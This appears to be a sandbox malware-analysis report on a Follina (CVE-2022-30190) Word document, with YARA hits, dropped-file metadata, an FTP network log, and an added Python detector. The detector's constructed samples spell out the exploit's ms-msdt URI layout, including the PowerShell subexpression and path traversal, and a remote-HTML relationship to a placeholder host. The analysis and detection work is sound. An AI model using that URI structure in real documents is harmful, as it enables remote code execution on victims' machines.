      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html, Author: Nasreddine Bencherchali, Christian Burkard
      • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html, Author: Tobias Michalski, Christian Burkard
      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD475AA.html, Author: Joe Security
      Antivirus:
      • Antivirus: Avira, Detection: 100%
      Reputation:low
      Preview:<!doctype html>.<html lang="en">.<body>.<script>.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAA
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:HTML document, ASCII text, with very long lines
      Category:dropped
      Size (bytes):6785
      Entropy (8bit):1.4819495400876375
      Encrypted:false
      SSDEEP:24:0pildlK8PkikLnPKZ2kbsMiPlRKVAsyeJuasL34SJ4T:08ldnUPyNbsMiPDlwsj4S2T
      MD5:119DBEA31494051D0D82FE7B2DBF8F93
      SHA1:E165513F48E0A94BD49D880421A3BFBD07B59ACA
      SHA-256:B621E986424FA067D0F46508FBEE741836B87AD44B373EEA01004E1C4896A31B
      SHA-512:01A9D0A7FA858721622AC73D3AA4F5AF3BF6DA702E9E6B7CB6077DB08A66944E4248DB561E9EF9FBD092ED62308FEF57BAFAF323C4C51A66136F8B7329944705
      Malicious:true
      Yara Hits:
      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html, Author: Nasreddine Bencherchali, Christian Burkard
      • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html, Author: Tobias Michalski, Christian Burkard
      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6245B5A3.html, Author: Joe Security
      Antivirus:
      • Antivirus: Avira, Detection: 100%
      Preview:<!doctype html>.<html lang="en">.<body>.<script>.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAA
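The three Yara hits on this cached HTML fire on the ms-msdt: URI stage of the chain (the PCWDiagnostic package and the IT_BrowseForFile= parameter that carries the PowerShell), and the report's signatures tie it back to a document whose relationships pull in an external part. As an added example, not code from the report or from the rule authors, the Python below implements both checks over constructed samples: it opens a minimal docx built in memory and lists relationships in word/_rels/document.xml.rels (the standard OOXML location) whose TargetMode is External, and it extracts and decodes ms-msdt: URIs from the HTML while measuring how much of the file is comment padding like the //AAAA… lines in the preview above. The relationship target, the ftp.example.invalid host and the Invoke-Expression placeholder are invented for the demo; the URI layout follows the public Follina proof of concept.

```python
"""Added example (not part of the Joe Sandbox report): indicator checks for the two
stages of a Follina (CVE-2022-30190) chain, an external relationship in the docx and
an ms-msdt: URI in the HTML it loads.  All samples below are constructed."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_PART = "word/_rels/document.xml.rels"          # standard OOXML location
RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

# Constructed sample: an oleObject relationship pointing at a remote HTML page, with the
# trailing "!" used in Follina samples; host and path are placeholders, not the report's.
SAMPLE_RELS = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="ftp://ftp.example.invalid/w/smartscreen.html!" TargetMode="External"/>
<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/>
</Relationships>"""

# Constructed HTML sample: comment padding (Follina pages are padded past ~4 KB so MSHTML
# processes them) followed by the redirect to the ms-msdt: URI; the payload is a placeholder.
PAD_LINE = "//" + "A" * 68 + "\n"
SAMPLE_HTML = (
    '<!doctype html>\n<html lang="en">\n<body>\n<script>\n'
    + PAD_LINE * 60
    + 'window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param '
    + '\\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu '
    + 'IT_BrowseForFile=$(Invoke-Expression(\'<constructed placeholder>\'))'
    + 'i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\"";\n'
    + '</script>\n</body>\n</html>\n'
)

JS_STRING = re.compile(r'"((?:[^"\\\n]|\\.)*)"')       # one double-quoted JS string literal
PARAM_KEY = re.compile(r"(IT_\w+)=")                   # msdt /param keys
COMMENT_PAD = re.compile(r"^//(.)\1{20,}$", re.M)      # comment line of one repeated char


def build_sample_docx():
    """Minimal in-memory docx (a zip) carrying the constructed rels part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr(RELS_PART, SAMPLE_RELS)
    return buf.getvalue()


def scan_rels(docx_bytes):
    """List relationships; flag external ones that are OLE objects or end in '!'."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        root = ET.fromstring(z.read(RELS_PART))
    found = []
    for rel in root.iter(RELS_NS + "Relationship"):
        target = rel.get("Target", "")
        external = rel.get("TargetMode") == "External"
        ole = rel.get("Type", "").endswith("/oleObject")
        found.append({"id": rel.get("Id"), "target": target, "external": external,
                      "suspicious": external and (ole or target.rstrip().endswith("!"))})
    return found


def padding_ratio(html):
    """Fraction of the file taken up by repeated-character comment lines."""
    padded = sum(len(m.group(0)) for m in COMMENT_PAD.finditer(html))
    return padded / max(len(html), 1)


def parse_msdt(uri):
    """Split an ms-msdt: URI into the troubleshooting package and its IT_* parameters."""
    body = uri[len("ms-msdt:"):]
    pkg = re.search(r"/id\s+(\S+)", body)
    par = re.search(r'/param\s+"(.*)"', body)
    params = {}
    if par:
        raw = par.group(1)
        keys = list(PARAM_KEY.finditer(raw))
        for i, k in enumerate(keys):
            end = keys[i + 1].start() if i + 1 < len(keys) else len(raw)
            params[k.group(1)] = raw[k.end():end].strip()
    browse = params.get("IT_BrowseForFile", "")
    # "$(" inside IT_BrowseForFile is the PowerShell subexpression msdt evaluates
    return {"uri": uri, "package": pkg.group(1) if pkg else None,
            "params": params, "powershell": "$(" in browse}


def scan_html(html):
    """Find JS string literals holding ms-msdt: URIs, unescape and decode them."""
    uris = [m.group(1).replace('\\"', '"').replace("\\\\", "\\")
            for m in JS_STRING.finditer(html)
            if m.group(1).lower().startswith("ms-msdt:")]
    return {"size": len(html), "padding_ratio": padding_ratio(html),
            "msdt": [parse_msdt(u) for u in uris]}


if __name__ == "__main__":
    print(scan_rels(build_sample_docx()))
    print(scan_html(SAMPLE_HTML))
```

On the report's own artefact the padding ratio is what makes the 6785-byte file have an entropy of 1.48: almost all of it is the repeated-A comment lines, and only the last script line carries the URI.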
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:PNG image data, 472 x 598, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):46224
      Entropy (8bit):7.952830864450301
      Encrypted:false
      SSDEEP:768:SXvKJDFb6VF0ZFm/C+pLUGAc+FREoRQ6I0IMRQRpyVCI5O4zn+O6ajETW:3MyD2jAfFGJsCRpyrO4zn+O6dK
      MD5:2D63CD1ECDCFF4BDAFBC58CC864A3E4A
      SHA1:7262B35EF8E8E20BEB4D6F65D70E9672F2A5587A
      SHA-256:9582FFB5FAB18CE903464EABEC820C51A3C24672C2A67C4200381164CE554BE8
      SHA-512:E94C42D46CBEC76AA9AC151C129AE126F39B6EF9B69D7EA559F4BA05660A97A29889994256EDF7015FA5BFC7A2EFDDC1E7BF36A1BEAC98AC5B590E29A24A0C01
      Malicious:false
      Preview:.PNG........IHDR.......V.....t.......sRGB.........pHYs..........+.....5IDATx^..$.$..9........;..d.W.>.7.V.uvgE.......n.......].Pw....L...Lu..<<..S;v..1.]/^.xe.k.]+'._.@...A`#...H....A ....#.C.q.SB...A`C...o..d..A .l....c...@....B .xC.%s...A`....o.....@....1.../..@....G .x.... .......!..|....@..8..^.|..RRB...A ....|....d..A .........R.@....F .x..%c...A`6.........@.X7.1.....@....A .x68.. .......!^7t....@....1..1... ...@..K. ....l..!...)%... .n.b...]2.. ..f.@..lpL)A ...u#.C.n.1... 0..b.g.cJ..A ......uC..A .... .C<..SJ...A`.......d..A .........R.@....F .x..%c...A`6.........@.X7.1.....@....A .x68.. .......!^7t....@....1..1... ...@..K. ....l..!...)%... .n.b...]2.. ..f.@..lpL)A ...u#.C.n.1... 0..b.g.cJ..A ......uC..A .... .C<..SJ...A`.......d..A .........R.@....F .x..%c...A`6.........@.X7.1.....@....A .x68.. .......!^7t....@....1..1... ...@..K. ....l..!...)%... .n.v.|.r.79....... 0..].vy..:..f..g...x..O.A ....@.q. ... .....oq... .....p./F.;..{......w.^.
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.025592455096956984
      Encrypted:false
      SSDEEP:6:I3DPcjCFvxggLRHYKfYRXv//4tfnRujlw//+GtluJ/eRuj:I3DPFrQvYg3J/
      MD5:C65E6C43949F0E1291B495961A463852
      SHA1:47A81BF112B13637D69A63B6A5B05AED2C67309C
      SHA-256:D93BC2C88406DC8A533D53E6B8EDC6AFF8D7DF3EC627502052D0632E53F004EE
      SHA-512:47F356E52A354B982D6765D15BE0345CAB20787BE56DAC12868615F46AB16AE09029C23D811BA543B489F91A8C4334A8E2814C5E0909FC5B26FFD917CDA18ED0
      Malicious:false
      Preview:......M.eFy...zqU2].m.J..3...&.S,...X.F...Fa.q.............................e....F.?a.B.S>...........l.,-A....@........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.025533631561520997
      Encrypted:false
      SSDEEP:6:I3DPcWeRvxggLREsH4/jBcfRXv//4tfnRujlw//+GtluJ/eRuj:I3DPSIsY/jBcJvYg3J/
      MD5:BB8B5FEA0EBA4355ED3209292FB5B6D5
      SHA1:57FABD411996035F633D3147BCE5C5352319F4E1
      SHA-256:F4A3AB9B358EE2BE85A8AD1FEB4B356068A700F691213E155AC98BD4CC023471
      SHA-512:5C067BDBA6E4E9D6964F73153E84C908627783AE9FDEDB602E04A61389EE67D4F4084DCDC460D3BBAA664353AD0D649C0A28B6F7321C6984A0B97F9C83A041FC
      Malicious:false
      Preview:......M.eFy...z>V.,...B../.'d..S,...X.F...Fa.q............................i.D...B.....Q..........0...LK+L.Fd.V.&.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:56 2022, mtime=Tue Mar 8 15:45:56 2022, atime=Mon Sep 19 21:34:14 2022, length=105652, window=hide
      Category:dropped
      Size (bytes):1014
      Entropy (8bit):4.579236388450332
      Encrypted:false
      SSDEEP:12:8fssFgXg/XAlCPCHaXNBQtB/SxXX+WacfY5iQOkDeicvb/3OkDKNDtZ3YilMMEpT:8fD/XT9SUDZQv9ezvODv3q+u7D
      MD5:BAFA09C6DD712A4DF8D35FB2B70D22AF
      SHA1:EA88399956CF7DDB6B803381DC49B8CEA3FE90B2
      SHA-256:01C711A49EF9F3FFA16899B929D046996E9EE56BF34303E5106EC41448123EA1
      SHA-512:B6266651EE3B987EFB43092DBA86975E0AD1F859C4DD4B0645259400E7A2740B0A21670E8473358841A717B3031873AF7770478801BCBE4FA99F3813D8C0F9C7
      Malicious:false
      Preview:L..................F.... ... d...3.. d...3..qA..w................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.....3UH. .BEWERB~1.DOC..J......hT..hT..*...r.....'...............B.e.w.e.r.b.u.n.g...d.o.c.x.......x...............-...8...[............?J......C:\Users\..#...................\\035347\Users.user\Desktop\Bewerbung.docx.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.B.e.w.e.r.b.u.n.g...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......035347..........D_....3N...W...9G..N..... .....[D_....3N...W...9G..N..
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):70
      Entropy (8bit):4.6877135109366135
      Encrypted:false
      SSDEEP:3:bDuMJl/IAlmxWsAzNAlv:bC0HTzq1
      MD5:24A53B806CB95D3F9F02BA065B7E5246
      SHA1:F5B36A4155A9702352ABD00999CA64A144EC7ED2
      SHA-256:77E29811AB165B4128F3DBE3774EE26C230570A0BBE2DD8EF334FAC1931F3CE4
      SHA-512:64C254633D1C58563292CCAC8D79D1E79F0404F73482EC5FC399FD80E338285644E1CF6CA9B341B7B3F9EBCFF03E4694DBEF266A9EBE44DC7EFEC9A3D54599AE
      Malicious:false
      Preview:[folders]..Templates.LNK=0..Bewerbung.LNK=0..[misc]..Bewerbung.LNK=0..
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.503835550707525
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
      MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
      SHA1:23684CCAA587C442181A92E722E15A685B2407B1
      SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
      SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
      Malicious:false
      Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.503835550707525
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
      MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
      SHA1:23684CCAA587C442181A92E722E15A685B2407B1
      SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
      SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
      Malicious:false
      Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
      File type:Microsoft Word 2007+
      Entropy (8bit):7.950500079961013
      TrID:
      • Word Microsoft Office Open XML Format document (49504/1) 49.01%
      • Word Microsoft Office Open XML Format document (43504/1) 43.07%
      • ZIP compressed archive (8000/1) 7.92%
      File name:Bewerbung.docx
      File size:105652
      MD5:e7521cc41970a93d81eb7db063563474
      SHA1:668afe1cf1ff3a6b8b9f9b0ceaa81549944bffc2
      SHA256:d28398402e0b64cfb6e1f8e28cc21584eddd159690c2dab80aafae9c79201ae0
      SHA512:660b372282395fec631a3b83693d5156a71408b59e72b22caa085dca025b11628d718ddae35866b60d29735e68665c28dcf0dcfb66205735b5cd098fab0a8691
      SSDEEP:1536:ysMyD2jAfFGJsCRpyrO4zn+O6dmlBvMT5oqFWIrjQBxwhQflTNJR1Aiaa9340:ysMy63s4pxAMT5oarsBxMQBNJRNFy0
      TLSH:ECA3023F26483EEAD705837A901514F7671880B562042F5AEA738ECCD9D962F3E3B674
      File Content Preview:PK..........!.R(G]t...........[Content_Types].xml ...(.........................................................................................................................................................................................................
      Icon Hash:e4e6a2a2a4b4b4a4
      Document Type:OpenXML
      Number of OLE Files:1
      Has Summary Info:
      Application Name:
      Encrypted Document:False
      Contains Word Document Stream:True
      Contains Workbook/Book Stream:False
      Contains PowerPoint Document Stream:False
      Contains Visio Document Stream:False
      Contains ObjectPool Stream:False
      Flash Objects Count:0
      Contains VBA Macros:False
      Title:
      Subject:
      Author:
      Keywords:
      Template:
      Last Saved By:
Revision Number:1
      Total Edit Time:0
      Create Time:2022-09-16T01:00:00Z
      Last Saved Time:2022-09-16T01:03:00Z
      Number of Pages:1
      Number of Words:3
      Number of Characters:24
      Creating Application:
      Security:0
      Number of Lines:1
      Number of Paragraphs:1
      Thumbnail Scaling Desired:false
      Company:
      Contains Dirty Links:false
      Shared Document:false
      Changed Hyperlinks:false
      Application Version:16.0000
      General
      Stream Path:\x1CompObj
      File Type:data
      Stream Size:77
      Entropy:2.954779533874008
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . F . . . . P B r u s h . . . . . P B r u s h . . . . . P B r u s h . 9 q . . . . . . . . . . . .
      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 0a 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 07 00 00 00 50 42 72 75 73 68 00 07 00 00 00 50 42 72 75 73 68 00 07 00 00 00 50 42 72 75 73 68 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
      General
      Stream Path:\x1Ole
      File Type:data
      Stream Size:20
      Entropy:0.8475846798245739
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . .
      Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      General
      Stream Path:\x1Ole10Native
      File Type:data
      Stream Size:846852
      Entropy:2.951888117201784
      Base64 Encoded:False
      Data ASCII:. . . B M . . . . . . 6 . . . ( . . . . . . V . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:00 ec 0c 00 42 4d e6 eb 0c 00 00 00 00 00 36 00 00 00 28 00 00 00 d8 01 00 00 56 02 00 00 01 00 18 00 00 00 00 00 b0 eb 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
      General
      Stream Path:\x3ObjInfo
      File Type:data
      Stream Size:6
      Entropy:1.2516291673878228
      Base64 Encoded:False
      Data ASCII:. . . . . .
      Data Raw:00 00 03 00 04 00
Timestamp                             Source Port  Dest Port  Source IP      Dest IP
Sep 19, 2022 15:35:09.402124882 CEST  49173        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:09.448999882 CEST  21           49173      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:09.449101925 CEST  49173        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:09.497766972 CEST  21           49173      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:09.497874975 CEST  49173        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:09.499121904 CEST  49173        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:09.545845985 CEST  21           49173      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:09.546256065 CEST  21           49173      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:09.546358109 CEST  49173        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:09.558320999 CEST  49173        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:09.635483980 CEST  21           49173      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:09.635663033 CEST  49173        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:09.666477919 CEST  49174        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:09.712331057 CEST  21           49174      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:09.712466002 CEST  49174        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:09.762413025 CEST  21           49174      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:09.762515068 CEST  49174        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:09.763664961 CEST  49174        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:09.809447050 CEST  21           49174      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:09.809530973 CEST  21           49174      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:09.809631109 CEST  49174        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:09.809971094 CEST  49174        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:09.883455038 CEST  21           49174      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:09.883622885 CEST  49174        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:09.884032011 CEST  49174        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:09.930010080 CEST  21           49174      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:09.930320024 CEST  49174        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:09.932235956 CEST  49174        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:09.978365898 CEST  21           49174      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:09.978560925 CEST  49174        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:09.983947039 CEST  49175        39352      192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:10.029231071 CEST  39352        49175      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:10.029839039 CEST  49175        39352      192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:10.030390024 CEST  49174        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:10.077305079 CEST  21           49174      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:10.077408075 CEST  49174        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:10.077773094 CEST  49174        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:10.123992920 CEST  21           49174      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:10.124073029 CEST  39352        49175      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:10.124116898 CEST  49174        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:10.124129057 CEST  49175        39352      192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:10.124149084 CEST  39352        49175      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:10.124182940 CEST  39352        49175      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:10.124197006 CEST  49175        39352      192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:10.124216080 CEST  39352        49175      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:10.124222040 CEST  49175        39352      192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:10.124248981 CEST  39352        49175      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:10.124258995 CEST  49175        39352      192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:10.124274015 CEST  39352        49175      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:10.124295950 CEST  49175        39352      192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:10.124296904 CEST  39352        49175      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:10.124320984 CEST  21           49174      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:10.124330997 CEST  49175        39352      192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:10.124346972 CEST  49175        39352      192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:10.124367952 CEST  49174        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:13.237507105 CEST  49173        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:13.283632994 CEST  21           49173      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:13.283799887 CEST  49173        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:13.284157991 CEST  49173        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:13.330005884 CEST  21           49173      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:13.330168962 CEST  49173        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:13.330579042 CEST  49173        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:13.376211882 CEST  21           49173      185.27.134.11  192.168.2.22
Sep 19, 2022 15:35:13.376344919 CEST  49173        21         192.168.2.22   185.27.134.11
Sep 19, 2022 15:35:13.377398014 CEST  49173        21         192.168.2.22   185.27.134.11
